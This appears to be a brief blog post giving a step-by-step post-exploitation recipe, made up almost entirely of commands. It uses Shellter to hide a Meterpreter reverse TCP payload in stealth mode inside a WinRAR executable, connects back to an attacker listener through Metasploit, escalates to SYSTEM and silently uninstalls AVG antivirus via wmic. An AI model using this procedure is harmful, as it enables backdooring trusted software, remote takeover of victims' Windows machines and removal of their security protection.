[Post-Exploitation] Remove Antivirus software on remote Windows Machine

by do son · Published August 19, 2017 · Updated February 15, 2018

<span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start"></span>

Command

cd Desktop/shellter

wine32 shellter.exe

Operation Mode: A (Automatic)

PE Target: Winrar.exe

Enable Stealth Mode: Stealth Mode

Use a listed payload or custom: L

Select payload by index: Meterpreter Reverse TCP

Set LHOST:

Set LPORT: 8080

service postgresql start

msfconsole

session -i 1

sysinfo

ps

getsystem

getuid

wmic product get name

wmic product where name="AVG" call uninstall /nointeractive